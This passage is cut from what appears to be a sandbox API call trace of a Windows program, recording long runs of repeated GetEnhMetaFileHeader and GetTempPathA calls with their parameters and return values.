nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.252] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 
lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.253] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] 
GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.254] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.273] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.274] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0096.275] GetTempPathA (in: 
